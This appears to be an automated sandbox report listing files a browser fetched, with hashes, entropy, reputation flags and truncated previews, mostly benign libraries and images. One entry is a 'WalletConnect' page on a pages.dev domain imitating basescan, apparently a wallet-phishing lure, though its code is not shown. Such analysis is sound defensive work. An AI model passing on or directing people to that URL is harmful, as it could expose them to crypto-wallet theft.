                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2071)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2072
                                                                                                                                                                                                                                              Entropy (8bit):5.361689504586738
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:maT0T4zJV8EZBocqvVUOO//Uk1nbT2U/nz:mix8ckUOO//h1nXl/z
                                                                                                                                                                                                                                              MD5:4BD0DB3556274F3004111BD8D57BAB46
                                                                                                                                                                                                                                              SHA1:78AC6BF04636B3BC469C1C48931CBEA8379EA561
                                                                                                                                                                                                                                              SHA-256:30E0DA5A34EEDAC051F1401DF538E6AB66B9B2C78F82A2F8771EA6B396C9F619
                                                                                                                                                                                                                                              SHA-512:2B70EE2F96AD9105C15EDD5F26CE7856FE9FF3F9F9A717361AC386337DA13246BB2CE797D99472446BA1A22BD5FAE483D597B13432305FD14DDD08FB19082EA0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/index-cb32ccd4.js
                                                                                                                                                                                                                                              Preview:import{c as s,i as l,e as y,s as c,t as u}from"./web-13cf6287.js";import{g as _}from"./manifest-51a3674f.js";import{C as o}from"./currency-format-1c532f37.js";import{T as $}from"./table-f81aed47.js";import{t as r}from"./i18n-fcfac1d2.js";import{s as p}from"./index-96ed660e.js";import{s as b}from"./index-76d972f3.js";import"./solid-js-38561dfe.js";import"./_baseGetTag-c2e287b9.js";import"./isArray-79a0be9c.js";import"./http-f4555b94.js";import"./baseService-449c2e3e.js";import"./_baseFor-3fee30d6.js";import"./_MapCache-1fb5cc44.js";var C=u('<span class="w-24 overflow-hidden text-ellipsis font-extrabold">'),h=u("<span class=uppercase>"),L=u('<span class="font-semibold text-brand">'),w=u('<div class="flex flex-col items-center justify-center pt-3"><img class=h-12><div class="flex gap-x-1"><img class=size-5><span class="font-extrabold text-primary"></span><img class=size-5>');const E=()=>s(_,{get children(){return s(I,{})}}),I=()=>{const[g]=b.spinFeedResource(),x=()=>[{title:r("User Name")
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 267, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):37105
                                                                                                                                                                                                                                              Entropy (8bit):7.993095703842513
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:768:z02zMGVFMpCqbtQCJWUL+9n6QlQZZwSrBHe7e3gfNz8zES651:zcGVepdi8L2tSZ/r07UgfMh651
                                                                                                                                                                                                                                              MD5:D42C3E5E9F94757355D6C126FB3A7CF7
                                                                                                                                                                                                                                              SHA1:796DF6A944F23F35BD5F9D7731202DF6E10130B7
                                                                                                                                                                                                                                              SHA-256:FA8DBD66D60767E2B19DEE4FA7AE2D42ABBE98FC771D3EBDDDA9B8A31043578D
                                                                                                                                                                                                                                              SHA-512:A64139631C92AA99AF5B8E1DED4DCD45C7C792D2FAF962FE2B11FBD3A456D1D5B614D00CF90221DB679AFBE8974143316654D694A62487E532BAC282075B4250
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............1^g....sRGB....... .IDATx^.y.%.U.x.Z...W..nukiI.,/.0...&&8.3.g&.$.'.e.d.l...!.|..a.O..C&0...b .......2.dI........v.|.9..n..~KKjI-s.....Uu..o.s.....8.kzu....cZ3...$g...M..$..,.........N.1.3$..`WF...j_...i....s...f.L..\.X...X...mDot`..].:.!.8.I.9 J....d].5.]A.......nzC3...BEJ..Zt.`k...<k.........~..:.3.p@..Y(...(.Y.....l.u..|}...w.....c.:....bQh.c...m.n..7.^...w8....c......m..e...}.....C.k..#.:..>...(.8c....K.".....kW.G`...k.+...;G........',.+..S.I.zM..........fz.kA.8....j.....]T..X.=.y.....kg..\...6.......P....q...$..._W."K.KDG.%...w....].9.l......4.c~...^.*....&.Z..r.#...1.U$.]i.FG.......v"...~..> ..`T.....$<......u.8!....7.....u..u.r,..0..|4G..+p....J.....t.y`.!R.;=.H...vu;s,...+.P.&H!..xu..F..+l.i ..4...m.t.......2...C...[._..#^e....3HC#.i...z.."zn.........l.[....z.....F...!./-E.V.-.^..g.W..4.Q........X.MW.N..U......b...duHE!...@..]EIf..6.. ..a.9...P..Q...U ....O.la...1.[..i.Tp[..7.....|.1+..Lg/(.,....1.f..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1313
                                                                                                                                                                                                                                              Entropy (8bit):4.783853316368474
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:t7rftujevOp9U2ooog5M5xwfsQHLfNhqZHfSUcUN1Ea0/yCm9WfABLnvmtD2yRH3:dfYevg9UlA5M5xq7HLVsZ/SHAQ7mDLvg
                                                                                                                                                                                                                                              MD5:79563CDB1EAF18E2671A03FAF66D1ACA
                                                                                                                                                                                                                                              SHA1:C0CC6F66BF441FAC5E63F4AE39C4F31156D0CF11
                                                                                                                                                                                                                                              SHA-256:9BB16661BAAAB74C7E7CEEA77EFF3FCAB5BE834B8A95EA740A12DEEEA29F0786
                                                                                                                                                                                                                                              SHA-512:D6B3F26ABD885F3FD15D7036F10BF6CB7E995DF18303A1CBEF31A9875D02C3264F7E61F04033610AD35197ED52815F6E29346217BB0448B806B68B8ACAF7C24F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<svg width="256" height="256" viewBox="0 0 256 256" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M186.384 171.561L243.497 138.588C246.518 136.842 248.397 133.591 248.397 130.099V64.1433C248.397 60.6566 246.518 57.4003 243.497 55.6543L186.384 22.6815C183.363 20.9356 179.605 20.9407 176.584 22.6815L119.47 55.6543C116.45 57.4003 114.571 60.6515 114.571 64.1433V182.001L74.5219 205.117L34.4733 182.001V135.752L74.5219 112.635L100.941 127.882V96.8601L79.4218 84.439C77.937 83.5839 76.2422 83.1334 74.5219 83.1334C72.8016 83.1334 71.1069 83.5839 69.6221 84.439L12.5034 117.417C9.48256 119.163 7.60352 122.414 7.60352 125.906V191.857C7.60352 195.343 9.48256 198.6 12.5034 200.346L69.617 233.323C72.6378 235.064 76.3907 235.064 79.4166 233.323L136.53 200.351C139.551 198.605 141.43 195.348 141.43 191.862V74.0044L142.152 73.5897L181.479 50.8876L221.527 74.0095V120.253L181.479 143.375L155.1 128.148V159.171L176.579 171.576C179.6 173.317 183.358 173.317 186.379 171.576L186.384 171.561Z" fill="u
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (998)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):81812
                                                                                                                                                                                                                                              Entropy (8bit):5.630611294359096
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:FlIIcoq6OP7AMkBNNMnFpFu696MBdSqLlRsOdswnbvJKJvSoCTxP:nFrOP7AMkPNMnFpFZ96MdOmJKJvSJ
                                                                                                                                                                                                                                              MD5:1C188EABF1F0749A0CFFB2C108473370
                                                                                                                                                                                                                                              SHA1:1333F32DE6536DE193C47D36F7EF680C0277DC7E
                                                                                                                                                                                                                                              SHA-256:8DDC6CBDB63A791BFC33F40D4B0A250A18E85E0AE93F72389EBDA9242BEF010D
                                                                                                                                                                                                                                              SHA-512:FCD4F584BCB52C7A21D3A5CE49EEFDAFEF9BC2FA22EF5F3DCB51F9BDA7DF51AA737233FFE29067CCD981E52CE8067BF53D94032C907DA00A354D62F2905137EB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:(function(){var A=window.Adform=window.Adform||{};var aa=Object.prototype.toString,ca=Object.prototype.hasOwnProperty;function G(a,c){if(null!=a)if(a.forEach)a.forEach(c);else for(var b=0;b<a.length;b++)c(a[b],b,a)}function da(a,c,b){return b()?a+"="+c:""}function ea(a,c){null!=c&&""!=c&&a.push(c)}function ja(a){return L(a)&&"[object Array]"==aa.call(a)}function ka(a){return L(a)&&"[object Object]"==aa.call(a)}function la(a){return L(a)&&"[object String]"==aa.call(a)}function ma(a){return!isNaN(parseFloat(a))&&isFinite(a)}.function L(a){return"undefined"!=typeof a}function na(a){return a=(-1!=a.indexOf("%")?a:encodeURIComponent(a)).replace(/\+/g,"%2B")};var oa=window.document,pa=window.location,Da={setCookie:qa,readCookie:ra,isOptedOut:sa,readCookieSafely:ta,setCookieSafely:ua,eraseCookie:va,setFPCookie:wa,readFPCookie:xa,getQSParam:ya,processFirstPartyCookie:za,redirectBack:Aa,optOutForNumberOfDays:Ba,optOut:Ca};function qa(a,c,b,e,f){var h="";b&&(h=new Date,h.setTime(h.getTime()+864E
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (32073), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):253680
                                                                                                                                                                                                                                              Entropy (8bit):5.143374112659264
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:GkHOJo1g7SV7opRBXDrtnAcKzvFYi/5uLO1aG0qFf/nHOl16j:LY/K3COVlFHS16j
                                                                                                                                                                                                                                              MD5:7EA717799EF7FA610F53EA03784FF68E
                                                                                                                                                                                                                                              SHA1:680FA38FCC529A5C2DE45A928B05BECFB5071542
                                                                                                                                                                                                                                              SHA-256:2AD4F5D82E27B67E902B6E50CDAC99E7F7FFDA9CCAD7F950DC4526EA41FB4776
                                                                                                                                                                                                                                              SHA-512:22AAC09F08A592A36125F851B3FAC0929BA87240418E7356B711250E89C39EA3E9F5B453B11B6670E93FC22519277DC43FA0B8A6901475192BD9E4E64E75B36E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/jquery-ui/jquery-ui.min.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:/*! jQuery UI - v1.12.1 - 2016-09-14..* http://jqueryui.com..* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sorta
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (729)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):730
                                                                                                                                                                                                                                              Entropy (8bit):5.206460158265451
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:yXp2VcZqmjT6P0uMRSPK6NFg4n382jVUQnIRzMnVAC8RC6yUDj1Huoy:O79SlNFj382hUQnsEWZ9Huoy
                                                                                                                                                                                                                                              MD5:0E3797C05E05F5322A9DEE58FE5EE593
                                                                                                                                                                                                                                              SHA1:21F1C73A032A368B64340F636F5502398087F34C
                                                                                                                                                                                                                                              SHA-256:A4D8784D77AB5FE0BD3EA2AED6DA8899D59E39686DD33C15B4BBDD7584D307D6
                                                                                                                                                                                                                                              SHA-512:1C1C13AB1A7727DFFE45CFB5F7E4ACB7C61437491A21B88AAE7CE4BD12D58942140BE4858A0D8F95CF914866E66A5D3CC01713A7183339FD66354181F6D7D94F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/animate-number-f0294c10.js
                                                                                                                                                                                                                                              Preview:import{j as u,b as f,i as t,e as d,a as b,t as g}from"./web-13cf6287.js";import{a6 as P,c as n}from"./manifest-51a3674f.js";import{L as _}from"./index-3fd48be3.js";import{i as $,m as h,b as v,d as x}from"./solid-js-38561dfe.js";var w=g("<span><span></span><span class=invisible>");const j=o=>{const[i,r]=$(o,["number","duration","children","from","ease"]),e=h({duration:3e3,from:0,ease:_.easeInOut},i),[l,m]=v(e.from),c=P(l,{duration:e.duration,ease:e.ease});return x(()=>{m(e.number)}),(()=>{var a=w(),s=a.firstChild,p=s.nextSibling;return u(a,f(r,{get class(){return n("relative text-nowrap",r.class)}}),!1,!0),t(s,()=>e.children(c())),t(p,()=>e.children(e.number)),d(()=>b(s,n("absolute left-0 top-0"))),a})()};export{j as A};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1090
                                                                                                                                                                                                                                              Entropy (8bit):7.76267757145015
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:XRv4MIXGrWbd2nvwTXWAnjbWAegMQEqCRDZlnuFFNYk4Cv2l5F2X3/:hv9IWaJ2wjbWaAl7cFNYnCyG
                                                                                                                                                                                                                                              MD5:4DB055C49747AA50D14C24F10D7A1891
                                                                                                                                                                                                                                              SHA1:133A9542F088DB0D5A815816AC459FA159530980
                                                                                                                                                                                                                                              SHA-256:601A5E7D8EFC2FEBF00A794721354AC83CF4326542602DFA7C787711BC1ADCDD
                                                                                                                                                                                                                                              SHA-512:036C673E75C3FACB848EECF0271F08E17C4E2E55F5942B50B6835C0C7800865ADEF6039F42AAA2270D31FB73B77C73E68B53ADAB916BA7710871C25472BA3E9B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.....................sRGB.........IDATx..]h.u..?.....lmnj......T.8m..\.....Q.........3.B...7....7.,..... ..HSgSt..._....m.E}.....|.........oH......_f.P..V5..[Z[E9}..^.<&.<..N.o{...m..79..^;qh.....>.uM......\.@...kO.~dgwT.\..W.j..{.2q`..7.[...o....rE2...F.[_..j..~GR...dSgDv-..t.m...u...."...eSQz`EL...*..V...%3...p..f...#'76...Q.;R...@:.....c.b..J...+".RQ9.xB...)...s.IF...6..jRj.7}...(....IG...'.......tEe......$.bB.xB.X. ...*5).J....h....p..6.f......]..5=..........c9.r@......S9[....Y.j+ .....jn..V8.....6............7..xA.=......ziE..y..`.}>......$k{...@).4.C.+.!zSA.J.]~.g..U.y.....a...H.TW(.^.q.0.f^.4x.VV11.?^4..2..BwR..;0.x..;..x..y.....rY.s#!N.QIO"CgK...|.C-7..,..L..\..>r~....>..(.*-......aAK.|.L....Q.&.~...yD..(....M.U.;..g..#"h.....T.]..... ~......W'..."..|>...!r.Ih.vN/X...r...1.......r&Uj..A2..U.1mn^.p.j5S... X.A...~.8...J8.5.'.C.uUYB5......&.........jj.<BeP..........A..._..>..P .u..R..J=....T6.c..E..A.n>WR.x........GV..~.F...$.e
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (60162), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60447
                                                                                                                                                                                                                                              Entropy (8bit):5.131970132953784
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:X4YN+vOLYGmObgUDZM8fW+l3sLaSLPe6CMhYVRK0H/9V2Vz/kq8GPnlvG/AD22bj:XX+GXht8xmwYYLsHPnAx
                                                                                                                                                                                                                                              MD5:50227698239C2613E481717AFE57D011
                                                                                                                                                                                                                                              SHA1:5E1C8083B20E96856E86F15C7D0966812D8AF464
                                                                                                                                                                                                                                              SHA-256:97EA5BB04788D41D2DC6A2C787AC57858ADDE676E32961535124C102AD3201F4
                                                                                                                                                                                                                                              SHA-512:058F52C94ED615C4D059A1BFFDAD60CBDAD506D57AE15EF774BC01AD32D73827769E88EF44DDF5E1BC04D01E1B42105E1E8B4B9E1BFFD98ADE5CC891A1AB6AA1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:/*!.. * Bootstrap v5.2.1 (https://getbootstrap.com/).. * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors).. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */..!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e(require("@popperjs/core")):"function"==typeof define&&define.amd?define(["@popperjs/core"],e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e(t.Popper)}(this,(function(t){"use strict";function e(t){if(t&&t.__esModule)return t;const e=Object.create(null,{[Symbol.toStringTag]:{value:"Module"}});if(t)for(const i in t)if("default"!==i){const s=Object.getOwnPropertyDescriptor(t,i);Object.defineProperty(e,i,s.get?s:{enumerable:!0,get:()=>t[i]})}return e.default=t,Object.freeze(e)}const i=e(t),s="transitionend",n=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let i=t.getAttribute("href");if(!i||!i.includes("#")&&!i.startsWith("."))return null
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2236), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2236
                                                                                                                                                                                                                                              Entropy (8bit):5.214680196002364
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:c8H3KXcTPkPpPPPgRGPZC8jKrsH/rmZrN55aMPJd1daiJPdUYtooLL2de4RHFaxf:NxQJHz9gTZ19123w
                                                                                                                                                                                                                                              MD5:64CF5AA6011F4BBAD6146BBAADC00573
                                                                                                                                                                                                                                              SHA1:151111EBD64EA1E0876B34833462FCDEC2545F2C
                                                                                                                                                                                                                                              SHA-256:01A486F50F9EFCC1D5F59887E71509B7C7F85E532C5144630E33D4511DB139AF
                                                                                                                                                                                                                                              SHA-512:68F25A382D48FAC565A9893DBCFD002ACBCDA8941DFF8857BFFFD146FA4EE82D5A3680E2AC5AF3D9945CD47EC6B5F77A9A09D313A0235528FE7ADC2EDCC0E6F2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:define("ace/theme/dawn",["require","exports","module","ace/lib/dom"],function(e,t,n){t.isDark=!1,t.cssClass="ace-dawn",t.cssText=".ace-dawn .ace_gutter {background: #ebebeb;color: #333}.ace-dawn .ace_print-margin {width: 1px;background: #e8e8e8}.ace-dawn {background-color: #F9F9F9;color: #080808}.ace-dawn .ace_cursor {color: #000000}.ace-dawn .ace_marker-layer .ace_selection {background: rgba(39, 95, 255, 0.30)}.ace-dawn.ace_multiselect .ace_selection.ace_start {box-shadow: 0 0 3px 0px #F9F9F9;}.ace-dawn .ace_marker-layer .ace_step {background: rgb(255, 255, 0)}.ace-dawn .ace_marker-layer .ace_bracket {margin: -1px 0 0 -1px;border: 1px solid rgba(75, 75, 126, 0.50)}.ace-dawn .ace_marker-layer .ace_active-line {background: rgba(36, 99, 180, 0.12)}.ace-dawn .ace_gutter-active-line {background-color : #dcdcdc}.ace-dawn .ace_marker-layer .ace_selected-word {border: 1px solid rgba(39, 95, 255, 0.30)}.ace-dawn .ace_invisible {color: rgba(75, 75, 126, 0.50)}.ace-dawn .ace_keyword,.ace-dawn .a
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):16039
                                                                                                                                                                                                                                              Entropy (8bit):7.867645815829432
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:pYNg7/Zw9xLie0/WbCyYrEFNc4/hPGK3Q+do51iffGD1:pYyK9x+eYRrQC4tG1yGQf0
                                                                                                                                                                                                                                              MD5:2A13B4678260F2B6BEF45E6C5E594680
                                                                                                                                                                                                                                              SHA1:76CB48EE7A593EA061EE39F31D3BD3E9E0DB6741
                                                                                                                                                                                                                                              SHA-256:68D33908B19A0F613204324F98D25A6B6BF0656F7A0963982D18FA9653702EC2
                                                                                                                                                                                                                                              SHA-512:309DCEB6C8FAE619108E0B1E3286DCDB380FD7566E1DE848D4C9FC1C529A2AD1D08DFCE7E50231E733B112D49BEE8E43F10788E9E8BD06803CF6A71B2044F4F4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/d761cd69ed.jpg?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o..18...(iinf..........infe........av01Color.....iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (5010)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5011
                                                                                                                                                                                                                                              Entropy (8bit):5.361428949446435
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:Uz+BNBBnB3C3jWqsd8X2j3AvFHSFBf+7YgvjAlYA+qCG/m6iBjCw0zQLv:IAzBnBqsd86Q9y/m7YXYK3/m6UCR4v
                                                                                                                                                                                                                                              MD5:203BA79AFDD61721A21BCAC085B3F06D
                                                                                                                                                                                                                                              SHA1:93034FF74DE28CB335E2129157CA7E16B8EA8FA2
                                                                                                                                                                                                                                              SHA-256:3A53D82861CB80282BA21EB60CAC66036B6D1762BC45E7C52D57592A9971C60D
                                                                                                                                                                                                                                              SHA-512:48B1A44EBA083E8DFF0A8377E765E2E6456A274CFB36E40D2C110D7FA7D257E8AC0A99CF462200A11C7465EB765010BC203012843F384264D5148A176D7B9AC4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{g as m,a as D,L as $,b as d,M as K,t as p}from"./_MapCache-1fb5cc44.js";import{a as w,i as k}from"./isArray-79a0be9c.js";import{r as g,b as T,f as R}from"./_baseGetTag-c2e287b9.js";function wr(t){return t}var W=m(g,"WeakMap");const v=W;var N=9007199254740991,q=/^(?:0|[1-9]\d*)$/;function X(t,r){var e=typeof t;return r=r==null?N:r,!!r&&(e=="number"||e!="symbol"&&q.test(t))&&t>-1&&t%1==0&&t<r}var H=9007199254740991;function z(t){return typeof t=="number"&&t>-1&&t%1==0&&t<=H}function Y(t){return t!=null&&z(t.length)&&!D(t)}var Z=Object.prototype;function J(t){var r=t&&t.constructor,e=typeof r=="function"&&r.prototype||Z;return t===e}function Q(t,r){for(var e=-1,n=Array(t);++e<t;)n[e]=r(e);return n}var tt="[object Arguments]";function x(t){return w(t)&&T(t)==tt}var G=Object.prototype,rt=G.hasOwnProperty,et=G.propertyIsEnumerable,at=x(function(){return arguments}())?x:function(t){return w(t)&&rt.call(t,"callee")&&!et.call(t,"callee")};const nt=at;function ot(){return!1}var L=typeof e
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8816), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):8816
                                                                                                                                                                                                                                              Entropy (8bit):5.271947938315623
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:DtAMjXrfErgZ3ns5fY77HUuLAyEVBXHSfOEKthiSV57pYC:DFjXrfErgZ3nG6ZxVioSV57SC
                                                                                                                                                                                                                                              MD5:E59BED652BCBB275AA7A59FC188FA12F
                                                                                                                                                                                                                                              SHA1:29E202682AB8D88DFA06E41A0E1001E83B5208C2
                                                                                                                                                                                                                                              SHA-256:2FC25C86FCA8A45E9DCF78370BF9A8664420FF36B83E86371B2EA73177EC35ED
